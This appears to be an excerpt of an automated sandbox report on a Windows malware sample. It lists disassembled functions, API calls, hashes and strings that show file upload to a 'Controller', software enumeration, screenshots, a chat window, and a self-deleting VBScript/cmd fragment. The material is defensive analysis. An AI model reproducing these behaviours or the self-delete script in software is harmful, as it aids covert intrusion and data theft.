• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
• Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
• Opcode Fuzzy Hash: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
• Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
• LoadLibraryA.KERNEL32(?), ref: 00414E17
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
• FreeLibrary.KERNEL32(00000000), ref: 00414E3E
• LoadLibraryA.KERNEL32(?), ref: 00414E76
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
• FreeLibrary.KERNEL32(00000000), ref: 00414E8F
• GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
• FreeLibrary.KERNEL32(00000000), ref: 00414EB5
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
• Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
• Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
• Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
Uniqueness
Uniqueness Score: -1.00%
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
• GetCursorPos.USER32(?), ref: 0041D5E9
• SetForegroundWindow.USER32(?), ref: 0041D5F2
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
• Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
• ExitProcess.KERNEL32 ref: 0041D665
• CreatePopupMenu.USER32 ref: 0041D66B
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
• Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
• Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
• Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
• Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
• Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
• Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
Uniqueness
Uniqueness Score: -1.00%
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
• GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
• __aulldiv.LIBCMT ref: 00408D4D
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
• CloseHandle.KERNEL32(00000000), ref: 00408F64
• CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
• CloseHandle.KERNEL32(00000000), ref: 00408FFC
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
• API String ID: 3086580692-2582957567
• Opcode ID: 392b21deea310a1671e8a27760ce354b49806b519abc882ab8ae47c583445ee5
• Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
• Opcode Fuzzy Hash: 392b21deea310a1671e8a27760ce354b49806b519abc882ab8ae47c583445ee5
• Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 0045130A
  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
• _free.LIBCMT ref: 004512FF
  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
• _free.LIBCMT ref: 00451321
• _free.LIBCMT ref: 00451336
• _free.LIBCMT ref: 00451341
• _free.LIBCMT ref: 00451363
• _free.LIBCMT ref: 00451376
• _free.LIBCMT ref: 00451384
• _free.LIBCMT ref: 0045138F
• _free.LIBCMT ref: 004513C7
• _free.LIBCMT ref: 004513CE
• _free.LIBCMT ref: 004513EB
• _free.LIBCMT ref: 00451403
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
• Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
• Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
• Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 274C7D06
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C90D7
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C90E9
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C90FB
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C910D
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C911F
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9131
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9143
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9155
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9167
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9179
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C918B
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C919D
  • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C91AF
• _free.LIBCMT ref: 274C7CFB
  • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
  • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
• _free.LIBCMT ref: 274C7D1D
• _free.LIBCMT ref: 274C7D32
• _free.LIBCMT ref: 274C7D3D
• _free.LIBCMT ref: 274C7D5F
• _free.LIBCMT ref: 274C7D72
• _free.LIBCMT ref: 274C7D80
• _free.LIBCMT ref: 274C7D8B
• _free.LIBCMT ref: 274C7DC3
• _free.LIBCMT ref: 274C7DCA
• _free.LIBCMT ref: 274C7DE7
• _free.LIBCMT ref: 274C7DFF
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: b8d03fea1ebf82b6d20cc4d6b43cb571905f0049aa5a4f438ae9ba1464554811
• Instruction ID: fd6a0ef050711d57c3c633b6d218a631521bda982b7952938f4091e218e73ab3
• Opcode Fuzzy Hash: b8d03fea1ebf82b6d20cc4d6b43cb571905f0049aa5a4f438ae9ba1464554811
• Instruction Fuzzy Hash: 68314F39600206EFEB23DB78D941FEBB7E9EF40651F20445DE968D7255DE31AA80C711
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041C726
• RegCloseKey.ADVAPI32(?), ref: 0041C9BF
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
• API String ID: 1332880857-3730529168
• Opcode ID: fe41e2c48cb5ed6e69364d887337216270dcb4f480170134fc4dfc7e7307ae20
• Instruction ID: 30dd124696def6d144da0f01c12024620090e461f41beb3abd2b2340f2562d2c
• Opcode Fuzzy Hash: fe41e2c48cb5ed6e69364d887337216270dcb4f480170134fc4dfc7e7307ae20
• Instruction Fuzzy Hash: E961F3711082419AD325EF11D851EEFB3E8BF94309F10493FB589921A2FF789E49CA5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00419FB9
• GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
• Sleep.KERNEL32(000003E8), ref: 0041A0FD
• GetLocalTime.KERNEL32(?), ref: 0041A105
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                                    • API String ID: 489098229-1431523004
                                                                                                                                                                    • Opcode ID: 81710880b5fae4ed1c718bbdca35622b315e6849759b54d5d3668d4ccc3b285b
                                                                                                                                                                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 81710880b5fae4ed1c718bbdca35622b315e6849759b54d5d3668d4ccc3b285b
                                                                                                                                                                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                                                                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                                                                                                                      • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                                                                                                                      • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                    • API String ID: 1913171305-3159800282
                                                                                                                                                                    • Opcode ID: ae67ee83cbbb03383b3b129e7661274cc7e85276f6748a043389e50a88fb4ee3
                                                                                                                                                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                                                                                                                    • Opcode Fuzzy Hash: ae67ee83cbbb03383b3b129e7661274cc7e85276f6748a043389e50a88fb4ee3
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                    • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                                                                                                                    • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00455CEF
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00455D0C
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00455D15
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00455EB1
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                                                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                                                                                                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                                                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID: \&G$\&G$`&G
                                                                                                                                                                    • API String ID: 269201875-253610517
                                                                                                                                                                    • Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                                                                                                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                                                                                                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 65535$udp
                                                                                                                                                                    • API String ID: 0-1267037602
                                                                                                                                                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                                                                                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                                                                                                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                                                                                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
• __dosmaperr.LIBCMT ref: 0043A8A6
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
• GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
• __dosmaperr.LIBCMT ref: 0043A8E3
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
• GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
• __dosmaperr.LIBCMT ref: 0043A937
• _free.LIBCMT ref: 0043A943
• _free.LIBCMT ref: 0043A94A
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
• Opcode ID: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
• Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
• Opcode Fuzzy Hash: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
• Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetEvent.KERNEL32(?,?), ref: 004054BF
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
• TranslateMessage.USER32(?), ref: 0040557E
• DispatchMessageA.USER32(?), ref: 00405589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: e5a3953c4a163948a1cd32b3b5d17358191a241843256080b0eacdefc84b5fe3
• Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
• Opcode Fuzzy Hash: e5a3953c4a163948a1cd32b3b5d17358191a241843256080b0eacdefc84b5fe3
• Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
• CloseHandle.KERNEL32(00000000), ref: 00417DE5
• DeleteFileA.KERNEL32(00000000), ref: 00417DF4
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
